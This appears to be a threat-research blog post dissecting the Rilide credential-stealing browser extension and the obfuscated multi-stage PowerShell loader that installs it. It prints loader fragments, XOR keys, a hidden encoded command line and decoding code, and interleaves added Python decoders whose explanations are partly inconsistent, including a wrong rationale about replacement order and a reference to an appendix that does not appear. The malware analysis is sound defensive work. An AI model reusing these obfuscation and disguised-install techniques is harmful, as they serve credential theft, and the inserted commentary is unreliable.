Rilide: An Information Stealing Browser Extension

By Pulsedive Threat Research
Published: 2025-03-21 · Archived: 2026-04-05 20:02:50 UTC

Rilide is an example of an information stealer masquerading as a browser extension. First reported in April 2023, the malware targets Chromium-based browsers such as Google Chrome and Microsoft Edge. It is designed to take screenshots, log passwords, and collect credentials for cryptocurrency wallets.

Rilide is delivered via malicious advertisements or phishing pages. When users interact with these payloads, a loader installs the Rilide extension. Security researchers have observed Rilide impersonating Google Drive and Palo Alto extensions. Associated IoCs can be accessed using Pulsedive's Explore feature.

This blog outlines:

- How Rilide is delivered
- A walkthrough of an intrusion chain that dropped Rilide
- Mitigation strategies

How Rilide is Delivered

Threat researchers have identified multiple delivery mechanisms used to drop Rilide, with phishing websites being the most common. Versions from August 2023 were adapted to work with Chrome Extension Manifest V3. Among the Manifest V3 changes is the removal of the ability to execute external logic using executeScript(), eval(), and new Function(). Moreover, Manifest V3 no longer allows developers to load and execute remotely hosted files; as such, all the logic must be part of the extension package itself.

The newer Rilide versions were delivered using three different mechanisms:

1. The first campaign uses a PowerPoint lure with a phishing website to fetch the Rilide stealer.
2. The second campaign leverages Twitter as the initial lure. When interacting with the Twitter lure, the user is redirected to a phishing website that downloads an executable file, which sets up the malicious extension using an LNK file.
3. Researchers at Trustwave grouped two separate vectors into a third campaign.
One of these intrusion chains is similar to the second campaign, the only exception being the use of Google Ads instead of Twitter; the rest of the chain remains the same. The other intrusion chain uses a PowerShell loader to install Rilide. It is unclear how the user receives the PowerShell loader.

https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/ Page 1 of 31

Figure 1: Campaigns leading to Rilide. This version of Rilide has been adapted to comply with the Chrome Extension Manifest V3 requirements. Source: Hacker News

The sample we analyzed for this blog belongs to campaign 3, which uses a PowerShell loader to install the malicious extension.

An Intrusion Dropping Rilide

A PowerShell Dropper

Toward the end of November 2024, VMRay shared details about a PowerShell script used to drop a Rilide sample. As of March 15, 2025, VirusTotal indicates that only four vendors flag the script as malicious. The earliest sample in the intrusion chain is the PowerShell script identified by VMRay; however, the exact way the script was delivered to the user is unknown. Figure 2 shows the complete intrusion chain observed during analysis.

Figure 2: Intrusion chain observed during analysis

Figure 3: VirusTotal results for the PowerShell script as of March 15, 2025. Source: VirusTotal

File Details

Characteristic   Value
MD5              650052f23efde0ed4460b760134db8c6
SHA-1            286574e458cddb32032ba4935d7f8e2716cfcf2c
SHA-256          76afc4a7ef10d760c3fa42458e8f133f1ed4d76071ab6f4207037f64a4bffab7
File Size        2.15 KB
File Extension   ps1

Behavior

First Stage

When the PowerShell script is run, it launches another PowerShell instance that executes base64-encoded commands without displaying the PowerShell window to the user.

Figure 4: Encoded PowerShell command captured within VMRay. Source: VMRay

The base64-encoded content can be decoded using CyberChef's From Base64 recipe.
The decoded content contains a base64-encoded string, which is manipulated by character replacements and XOR operations before being passed to the PowerShell method DownloadString as the URI.

Figure 5: Decoded PowerShell script contains base64-encoded values that go through a series of character manipulations.

The URI can be recovered by running the following code snippet within PowerShell; it stops at the point where the script would create a new web client connection.

```powershell
# Outer layer: restore the '@' placeholders to 'a', base64-decode, then XOR every byte with 198
$lUhpJ = ("kpC3/7WN/qCHo4b2sP@tgrfwv/+UrZ6oqfGIj4egrL7xlJeHt/GWt4OX+/s=")
$HgwsG = $lUhpJ.Replace("@", "a")
$TWJXW = [Convert]::FromBase64String($HgwsG) | ForEach-Object { $_ -bxor 198 }
# The XOR output is a second base64 string that uses the same '@' trick
$ZLb8q = [System.Text.Encoding]::ASCII.GetString($TWJXW).Replace("@", "a")
$RUveK = [Convert]::FromBase64String($ZLb8q)
# Inner layer: XOR with a 5-byte key that wraps around (rolling XOR)
$QK9tt = [byte[]](37, 46, 201, 192, 220)
$eyMTA = 0
$CJC2W = $RUveK | ForEach-Object { $_ -bxor $QK9tt[$eyMTA++]; if ($eyMTA -ge $QK9tt.Length) { $eyMTA = 0 } }
# $CJC2W now holds the ASCII byte values of the URI
$CJC2W
```

Outputting the variable that holds the ASCII values for the URI returns the array shown in Figure 6 below.

Figure 6: ASCII values holding the second stage domain

The array of ASCII values can be decoded using the PowerShell command $mdKyK = [System.Text.Encoding]::ASCII.GetString($CJC2W); or using CyberChef's From Decimal recipe.

Figure 7: The ASCII values converted into text to reveal the second stage URI.

WHOIS data for the decoded domain shows that it was registered with NameCheap. Moreover, the domain was registered on October 5, 2024, approximately a month before the post from VMRay.

Figure 8: WHOIS data within the Pulsedive platform for tcl-black[.]com

The domain was unreachable as of March 15, 2025, but historical data was stored on URLscan.io.
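The same first-stage unwrapping, reimplemented as an added Python example that is not code from the original post or from VMRay: it decodes the -e payload captured in Appendix 1 (tolerating the truncation seen there) and then peels the layers the PowerShell snippet above applies to the base64 blob. The blob, the XOR constants and the command-line fragment are copied from this page; the function names, and the encode_stage1_uri helper used only to build a constructed round-trip vector, are assumptions of this example.

```python
import base64
import re
from itertools import cycle
from typing import Optional

# Inputs copied from the page: the encoded-command fragment in Appendix 1 and the
# base64 blob from the decoded first-stage script (Figure 5).
APPENDIX_CMDLINE = (
    r'"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" '
    "-windowstyle hidden -e JABsAFUAaABwAEoAIAA9ACAAKAAiAGsAcABDAD"
)
STAGE1_BLOB = "kpC3/7WN/qCHo4b2sP@tgrfwv/+UrZ6oqfGIj4egrL7xlJeHt/GWt4OX+/s="
OUTER_XOR_KEY = 198                              # the "-bxor 198" step
INNER_XOR_KEY = bytes([37, 46, 201, 192, 220])   # the $QK9tt rolling key


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script passed via -e/-enc/-EncodedCommand (UTF-16LE base64), or None.

    PowerShell accepts any unambiguous prefix of the flag name, and captured command
    lines are often cut short (as in Appendix 1), so missing padding and a dangling
    odd byte are tolerated instead of raising.
    """
    for flag, payload in re.findall(r"-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)", cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue
        payload = payload.rstrip("=")
        if len(payload) % 4 == 1:          # a lone trailing char holds no whole byte
            payload = payload[:-1]
        raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
        if len(raw) % 2:                   # UTF-16 needs an even byte count
            raw = raw[:-1]
        return raw.decode("utf-16-le", errors="replace")
    return None


def rolling_xor(data: bytes, key: bytes) -> bytes:
    """XOR data with key, cycling through the key bytes (the $eyMTA counter loop)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_stage1_uri(blob: str, outer_key: int = OUTER_XOR_KEY,
                      inner_key: bytes = INNER_XOR_KEY) -> str:
    """Reverse the loader's layers in the order the script applies them:
    '@'->'a', base64, single-byte XOR, '@'->'a', base64, rolling XOR, ASCII."""
    outer = base64.b64decode(blob.replace("@", "a"))
    inner_b64 = bytes(b ^ outer_key for b in outer).decode("ascii").replace("@", "a")
    inner = base64.b64decode(inner_b64)
    return rolling_xor(inner, inner_key).decode("ascii")


def encode_stage1_uri(uri: str, outer_key: int = OUTER_XOR_KEY,
                      inner_key: bytes = INNER_XOR_KEY) -> str:
    """Inverse of decode_stage1_uri; only used to build constructed test vectors."""
    inner = rolling_xor(uri.encode("ascii"), inner_key)
    inner_b64 = base64.b64encode(inner)
    outer = bytes(b ^ outer_key for b in inner_b64)
    return base64.b64encode(outer).decode("ascii")


if __name__ == "__main__":
    print(decode_encoded_command(APPENDIX_CMDLINE))
    # Printed defanged; the result is the second-stage URI the script downloads.
    print(decode_stage1_uri(STAGE1_BLOB).replace(".", "[.]"))
```

The decoder is deliberately parameterized on the two XOR keys: variants of the loader can change the constants without changing the layering, and a reader with a different sample only needs to lift the new values from its snippet.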
The webpage contained obfuscated code that the PowerShell script manipulates by replacing certain characters before converting it from base64. Once the command is decoded, it is executed using PowerShell.

Figure 9: A historical scan showing the content hosted on the decoded URL. Source: URLscan.io

The character conversions employed during this stage are:

Original Value   New Value
!                l
*                d
`"               T
'                H
;                F

Figure 10: Decoded content from tcl-black[.]com reveals additional PowerShell commands

Second Stage

The decoded script contains another blob of base64 that goes through a series of manipulations before being executed using the iex command. The first manipulation is a series of character replacements that change certain symbols into characters within the base64 character set. The replacements are:

Original Value   New Value
%                d
$                a
!                b
@                B

This data is converted from base64 and XORed with a byte array. Following the XOR operation, the data is decrypted using AES-256 in Cipher Block Chaining (CBC) mode with PKCS7 padding. The decryption key and initialization vector are stored as hardcoded, base64-encoded variables.

Figure 11: The decoded PowerShell script pulled from tcl-black[.]com

Third Stage - Setting up Rilide

The decrypted data is additional PowerShell code that is executed. This code is used to install the Rilide extension. The PowerShell script's primary function is FCZoL, which first attempts to gather the current user's SID.

Figure 12: Decrypted content from the second stage PowerShell script that shows additional PowerShell commands.

Figure 13: The script uses PowerShell cmdlets to get the local user

The script then generates a random 80-character string consisting of alphanumeric characters.
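Before following the third stage further, here is the second-stage unwrapping from above written out as an added Python example (not code from the original post): the two character-replacement tables are transcribed from this page, and the function undoes substitution, base64 and the rolling XOR to expose the AES-256-CBC ciphertext, with the final AES/PKCS7 step as a separate function. The XOR byte array and the AES key and IV of the sample are not given on the page, so they are parameters; the test vectors are constructed with the example's own wrap_stage2 helper, and the function names are assumptions of this example.

```python
import base64
from itertools import cycle

# Replacement tables transcribed from the page (original character -> base64 character).
# The first table has a two-character original (backtick followed by a double quote), so
# the tables are ordered pairs applied with str.replace rather than a str.maketrans map.
PAGE_CONTENT_TABLE = [("!", "l"), ("*", "d"), ('`"', "T"), ("'", "H"), (";", "F")]
STAGE2_TABLE = [("%", "d"), ("$", "a"), ("!", "b"), ("@", "B")]


def apply_replacements(text: str, table) -> str:
    """Apply the substitutions in order, as the script's chained .Replace() calls do."""
    for old, new in table:
        text = text.replace(old, new)
    return text


def rolling_xor(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as needed."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def unwrap_stage2(blob: str, xor_key: bytes, table=STAGE2_TABLE) -> bytes:
    """Undo the layers that precede AES: character substitution, base64, rolling XOR.
    The result is the AES-256-CBC ciphertext the script hands to its decryptor."""
    return rolling_xor(base64.b64decode(apply_replacements(blob, table)), xor_key)


def aes256_cbc_pkcs7_decrypt(ciphertext: bytes, key_b64: str, iv_b64: str) -> bytes:
    """Final layer as described on the page: AES-256/CBC/PKCS7 with base64-encoded key and IV.
    Uses the 'cryptography' package, imported lazily so the rest of the module works without it."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    key, iv = base64.b64decode(key_b64), base64.b64decode(iv_b64)
    if len(key) != 32 or len(iv) != 16:
        raise ValueError("AES-256-CBC needs a 32-byte key and a 16-byte IV")
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(dec.update(ciphertext) + dec.finalize()) + unpad.finalize()


def wrap_stage2(data: bytes, xor_key: bytes, table=STAGE2_TABLE) -> str:
    """Inverse of unwrap_stage2, used only to construct test vectors."""
    b64 = base64.b64encode(rolling_xor(data, xor_key)).decode("ascii")
    for old, new in table:            # reverse direction: base64 char -> obfuscated char
        b64 = b64.replace(new, old)
    return b64


if __name__ == "__main__":
    # Constructed demonstration: a made-up 32-byte "ciphertext" survives a round trip.
    sample_key = bytes([0x10, 0x20, 0x30])
    blob = wrap_stage2(bytes(range(32)), sample_key)
    print(blob)
    print(unwrap_stage2(blob, sample_key).hex())
```

Note that the substitution tables must be applied in the listed order: the first table's two-character original (the escaped quote) would never match if "!" had already been turned into "l" by a later rule, which is why the helper keeps the pairs ordered instead of using a character map.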
The following line of the script converts a string of bytes into a UTF-8 encoded string. This string contains a base64 blob holding JSON data that appears to be related to the Rilide extension.

Figure 14: Character set returned from a function within PowerShell.

Figure 15: Base64 content reveals content that is later added to the Secure Preferences for managing settings for a Chrome profile.

Figure 16: Extension details added to Secure Preferences.

The PowerShell script then creates strings that hold paths to web browsers. The browsers targeted, and the paths specified in the malware, are:

Figure 17: PowerShell code used to create paths to web browser content on disk.

Web Browser   Path
Chrome        %localappdata%/Google/Chrome/User Data
Brave         %localappdata%/BraveSoftware/Brave-Browser/User Data
Edge          %localappdata%/Microsoft/Edge/User Data
Opera         %appdata%/Opera Software/Opera Stable

The PowerShell script contains all the content that makes up the Rilide files as hardcoded base64 strings. These strings are within the function aRUC2M. This function takes the previously created character set and the directory name where the extension will be stored. In this case, the directory name is $MxNC2$JJ0wH, as shown in the figure below.

Figure 18: Path where the Rilide files are saved on disk.

The script attempts to create the path shown in Figure 18 and then tries to create files within that directory.

Figure 19: Code used to create the $MxNC2$JJ0wH directory and drop the Rilide files.

Each file that makes up the Rilide extension is stored as a pair of base64-encoded strings: the first is the file name, and the second is the file's content. The script writes the file for any file name containing the extension *.png. If the file name contains the string manifest.json, a set of character replacements occurs before it is written to disk.
For all other files, the script just writes the content to a file on disk.

Encoded File Name  Decoded File Name
YXBwLmh0bWw=  app.html
Y29uZmlnLmpz  config.js
ZmlsZV9haGxkZmguanM=  file_ahldfh.js
ZmlsZV9hdWtqemxsdGkuanM=  file_aukjzllti.js
ZmlsZV9la3pwbHNqLmpz  file_ekzplsj.js
ZmlsZV9namVpd3pzdC5qcw==  file_gjeiwzst.js
ZmlsZV9wamJtY2dtLmpz  file_pjbmcgm.js
aWNvLnBuZw==  ico.png
bWFuaWZlc3QuanNvbg==  manifest.json
cnVsZXMuanNvbg==  rules.json
ZGlyX2pzcGN1eWZ1XGZpbGVfZGZlYWt5ZmlyLmpz  dir_jspcuyfu\file_dfeakyfir.js
ZGlyX2pzcGN1eWZ1XGZpbGVfa3ZueW5hLmpz  dir_jspcuyfu\file_kvnyna.js
ZGlyX2pzcGN1eWZ1XGZpbGVfdXFyZnRpanRnai5qcw==  dir_jspcuyfu\file_uqrftijtgj.js
ZGlyX2pzcGN1eWZ1XGRpcl9rbWlkZ1xmaWxlX215aHBuLmpz  dir_jspcuyfu\dir_kmidg\file_myhpn.js
ZGlyX2pzcGN1eWZ1XGRpcl9rbWlkZ1xmaWxlX253ZXFnaGxudS5qcw==  dir_jspcuyfu\dir_kmidg\file_nweqghln
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9mbXRxbi5qcw==  dir_jspcuyfu\dir_rodmrqczz\file_fmtqn
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9qcmZ4ZS5qcw==  dir_jspcuyfu\dir_rodmrqczz\file_jrfxe.
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9uZ2dtZ2dpcXYuanM=  dir_jspcuyfu\dir_rodmrqczz\file_nggm
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9uaXZ2aGRjLmpz  dir_jspcuyfu\dir_rodmrqczz\file_nivvh
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9vbnRjYWNyb3MuanM=  dir_jspcuyfu\dir_rodmrqczz\file_ontca
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9yem56dnB3Lmpz  dir_jspcuyfu\dir_rodmrqczz\file_rznzv
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfYWFjY2hvYWZzdi5qcw==  dir_jspcuyfu\dir_rovhzbzexe\file_aacc
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfYXZla2lmcnQuanM=  dir_jspcuyfu\dir_rovhzbzexe\file_avek
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfZHdvcGJkeC5qcw==  dir_jspcuyfu\dir_rovhzbzexe\file_dwo
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfc3Rla2xwZ3ouanM=  dir_jspcuyfu\dir_rovhzbzexe\file_stekl
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfeGlmanQuanM=  dir_jspcuyfu\dir_rovhzbzexe\file_xifjt
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfeXdkZ3dkdW5kLmpz  dir_jspcuyfu\dir_rovhzbzexe\file_ywd
ZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfYnBmZWxlLmpz  dir_jspcuyfu\dir_vhwpcwlaxi\file_bpfe
ZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfb2RybHVzaC5qcw==  dir_jspcuyfu\dir_vhwpcwlaxi\file_odrl
ZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfcmFwd2hjYXJhLmpz  dir_jspcuyfu\dir_vhwpcwlaxi\file_rapw
ZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfdnF5YmJyaGcuanM=  dir_jspcuyfu\dir_vhwpcwlaxi\file_vqy
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfY3hoamNla3YuanM=  dir_jspcuyfu\dir_wzjggrl\file_cxhjcekv
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfZGl6c3kuanM=  dir_jspcuyfu\dir_wzjggrl\file_dizsy.js
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfaHJ0c2RyZy5qcw==  dir_jspcuyfu\dir_wzjggrl\file_hrtsdrg.j
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfa253dnlqaGcuanM=  dir_jspcuyfu\dir_wzjggrl\file_knwvyjh
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfcHpib3ptby5qcw==  dir_jspcuyfu\dir_wzjggrl\file_pzbozmo
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfcW5tb2lleC5qcw==  dir_jspcuyfu\dir_wzjggrl\file_qnmoiex
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfdHdrbWlicXkuanM=  dir_jspcuyfu\dir_wzjggrl\file_twkmibq
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfdmlnbGJ0Y29zdC5qcw==  dir_jspcuyfu\dir_wzjggrl\file_viglbtco
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfeHRhZXouanM=  dir_jspcuyfu\dir_wzjggrl\file_xtaez.js
ZGlyX295cm5vcXFcZmlsZV9heGVscy5qcw==  dir_oyrnoqq\file_axels.js
ZGlyX295cm5vcXFcZmlsZV9iaHNoZXpoZW54Lmpz  dir_oyrnoqq\file_bhshezhenx.js
ZGlyX295cm5vcXFcZmlsZV9mcG1vbGJzLmpz  dir_oyrnoqq\file_fpmolbs.js
ZGlyX295cm5vcXFcZmlsZV9qZnJuZS5qcw==  dir_oyrnoqq\file_jfrne.js
ZGlyX295cm5vcXFcZmlsZV9ra3V5bXpxbmNzLmpz  dir_oyrnoqq\file_kkuymzqncs.js
ZGlyX295cm5vcXFcZmlsZV9rc2xreGN6Z3FzLmpz  dir_oyrnoqq\file_kslkxczgqs.js
ZGlyX295cm5vcXFcZmlsZV9wYWV3a3h5Lmpz  dir_oyrnoqq\file_paewkxy.js
ZGlyX295cm5vcXFcZmlsZV90cWR4bnltZi5qcw==  dir_oyrnoqq\file_tqdxnymf.js
ZGlyX295cm5vcXFcZmlsZV91c3poZ24uanM=  dir_oyrnoqq\file_uszhgn.js
ZGlyX295cm5vcXFcZmlsZV96YWJhcC5qcw==  dir_oyrnoqq\file_zabap.js
ZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2FicG5hb2guanM=  dir_oyrnoqq\dir_cqwucuiid\file_abpna
ZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2VsbXpsb3VyeC5qcw==  dir_oyrnoqq\dir_cqwucuiid\file_elmzl
ZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2hmZXpkanBoei5qcw==  dir_oyrnoqq\dir_cqwucuiid\file_hfezdj
ZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX29xaHV2d3h0ei5qcw==  dir_oyrnoqq\dir_cqwucuiid\file_oqhuv
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfYXJwaHB4bm5oLmpz  dir_oyrnoqq\dir_donxq\file_arphpxnnh
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfY2R0dnlrb2ouanM=  dir_oyrnoqq\dir_donxq\file_cdtvykoj.j
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfaGRodm92Lmpz  dir_oyrnoqq\dir_donxq\file_hdhvov.js
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfanltanUuanM=  dir_oyrnoqq\dir_donxq\file_jymju.js
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfbGdsZHFwdWxxZy5qcw==  dir_oyrnoqq\dir_donxq\file_lgldqpulq
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfbWNoY3RycWNuLmpz  dir_oyrnoqq\dir_donxq\file_mchctrqcn
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfcnFxYXEuanM=  dir_oyrnoqq\dir_donxq\file_rqqaq.js
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfd3hudnB4Lmpz  dir_oyrnoqq\dir_donxq\file_wxnvpx.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfY3l2aW9oaWpkai5qcw==  dir_oyrnoqq\dir_vzjkf\file_cyviohijdj.j
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZGN5dGdiaS5qcw==  dir_oyrnoqq\dir_vzjkf\file_dcytgbi.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZnhoemJjd3NxLmpz  dir_oyrnoqq\dir_vzjkf\file_fxhzbcwsq
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZ3F5bHZraGpzLmpz  dir_oyrnoqq\dir_vzjkf\file_gqylvkhjs.j
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfaHJxeGIuanM  dir_oyrnoqq\dir_vzjkf\file_hrqxb.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfbWdsZWxpdWd3Lmpz  dir_oyrnoqq\dir_vzjkf\file_mgleliugw.
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfb3hmc2d3YnUuanM=  dir_oyrnoqq\dir_vzjkf\file_oxfsgwbu.j
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfcXhjc2xyeC5qcw==  dir_oyrnoqq\dir_vzjkf\file_qxcslrx.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfc252dGEuanM=  dir_oyrnoqq\dir_vzjkf\file_snvta.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfc3NjcHJvdS5qcw==  dir_oyrnoqq\dir_vzjkf\file_sscprou.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2Fzb3RsZS5qcw==  dir_pdhfxnpkx\file_asotle.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2ZyYmpiZ2Z4eC5qcw==  dir_pdhfxnpkx\file_frbjbgfxx.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2hocHpxYnpzLmpz  dir_pdhfxnpkx\file_hhpzqbzs.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2htZnpxaS5qcw==  dir_pdhfxnpkx\file_hmfzqi.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2xlcHJjZ25qZC5qcw==  dir_pdhfxnpkx\file_leprcgnjd.js
ZGlyX3BkaGZ4bnBreFxmaWxlX25tZ3dwcnVlaHcuanM=  dir_pdhfxnpkx\file_nmgwpruehw.js
ZGlyX3BkaGZ4bnBreFxmaWxlX3lmYmxma3RjYS5qcw==  dir_pdhfxnpkx\file_yfblfktca.js
ZGlyX3BkaGZ4bnBreFxmaWxlX3lvc2dpZWFnbGcuanM=  dir_pdhfxnpkx\file_yosgieaglg.js
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfbGx3dnRvaHYuanM=  dir_pdhfxnpkx\dir_gracvf\file_llwvtoh
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfbHV2b2ouanM=  dir_pdhfxnpkx\dir_gracvf\file_luvoj.js
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfb2ltbGpuYWdzbC5qcw==  dir_pdhfxnpkx\dir_gracvf\file_oimljna
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfcHRwdm1zdm5xaC5qcw==  dir_pdhfxnpkx\dir_gracvf\file_ptpvms
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdWRnZ3AuanM=  dir_pdhfxnpkx\dir_gracvf\file_udggp.j
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdWRvbG9sLmpz  dir_pdhfxnpkx\dir_gracvf\file_udolol.j
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdXhseHdrbWEuanM=  dir_pdhfxnpkx\dir_gracvf\file_uxlxwk
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZHR1cmV2Z2ptay5qcw==  dir_pdhfxnpkx\dir_tojirz\file_dturevgj
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZmNhZXRmdm9ubi5qcw==  dir_pdhfxnpkx\dir_tojirz\file_fcaetfvo
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZnJwZ3hmcGsuanM=  dir_pdhfxnpkx\dir_tojirz\file_frpgxfpk
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfanpuYncuanM=  dir_pdhfxnpkx\dir_tojirz\file_jznbw.js
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfbXFqZG9sd2wuanM=  dir_pdhfxnpkx\dir_tojirz\file_mqjdolw
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfdGVmeHlhby5qcw==  dir_pdhfxnpkx\dir_tojirz\file_tefxyao.j
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfdm50aGhwZC5qcw==  dir_pdhfxnpkx\dir_tojirz\file_vnthhpd
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfeGl1Zm9odi5qcw==  dir_pdhfxnpkx\dir_tojirz\file_xiufohv.
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfeWVudHRreXFvLmpz  dir_pdhfxnpkx\dir_tojirz\file_yenttkyq
bW9kdWxlc1xjb250ZW50LXNjcmlwdHMtcmVnaXN0ZXItcG9seWZpbGwuNC4wLjAuanM=  modules\content-scripts-register-polyf
c3JjXFRvZ2dsZVRlc3QuanM=  src\ToggleTest.js
c3JjXGNvbnRlbnRcQWxlcnRSZWNlaXZlLmpz  src\content\AlertReceive.js
c3JjXGNvbnRlbnRcT3BlblJlbW92ZS5qcw==  src\content\OpenRemove.js
c3JjXGZpbmRlclxBbmFseXplUGFpbnQuanM=  src\finder\AnalyzePaint.js
c3JjXGZpbmRlclxBc3NpZ25UZXN0Lmpz  src\finder\AssignTest.js
c3JjXGZpbmRlclxDb3B5UmVkdWNlLmpz  src\finder\CopyReduce.js
c3JjXGZpbmRlclxEcmFnQ3JlYXRlLmpz  src\finder\DragCreate.js
c3JjXGZpbmRlclxEcmF3Lmpz  src\finder\Draw.js
c3JjXGZpbmRlclxFbmFibGVQZWVrLmpz  src\finder\EnablePeek.js
c3JjXGZpbmRlclxGb2N1cy5qcw==  src\finder\Focus.js
c3JjXGZpbmRlclxQcm9maWxlSW5zdGFsbENsb25lLmpz  src\finder\ProfileInstallClone.js
c3JjXGZpbmRlclxTaG93SGFuZGxlRHJhdy5qcw==  src\finder\ShowHandleDraw.js
c3JjXGZ1bmN0aW9uc1xDbG9zZVJlZHVjZS5qcw==  src\functions\CloseReduce.js
c3JjXGZ1bmN0aW9uc1xEZWxldGUuanM=  src\functions\Delete.js
c3JjXGZ1bmN0aW9uc1xEcmFnU3VtbWFyaXplLmpz  src\functions\DragSummarize.js
c3JjXGZ1bmN0aW9uc1xJbnZlcnQuanM=  src\functions\Invert.js
c3JjXGZ1bmN0aW9uc1xPcHRpbWl6ZUV2YWx1YXRlLmpz  src\functions\OptimizeEvaluate.js
c3JjXGZ1bmN0aW9uc1xQcmludC5qcw==  src\functions\Print.js
c3JjXGZ1bmN0aW9uc1xSZWNlaXZlLmpz  src\functions\Receive.js
c3JjXGZ1bmN0aW9uc1xSZW1vdmUuanM=  src\functions\Remove.js
c3JjXGZ1bmN0aW9uc1xSZXN1bWVSZXN1bWVNaXJyb3IuanM=  src\functions\ResumeResumeMirror.js
c3JjXGZ1bmN0aW9uc1xSZXRyaWV2ZVVwZGF0ZVN1Ym1pdC5qcw==  src\functions\RetrieveUpdateSubmit.js
c3JjXGZ1bmN0aW9uc1xSdW5EZXBsb3lGb2N1cy5qcw==  src\functions\RunDeployFocus.js
c3JjXGZ1bmN0aW9uc1xTYXZlLmpz  src\functions\Save.js
c3JjXGZ1bmN0aW9uc1xTZWxlY3REcmF3Lmpz  src\functions\SelectDraw.js
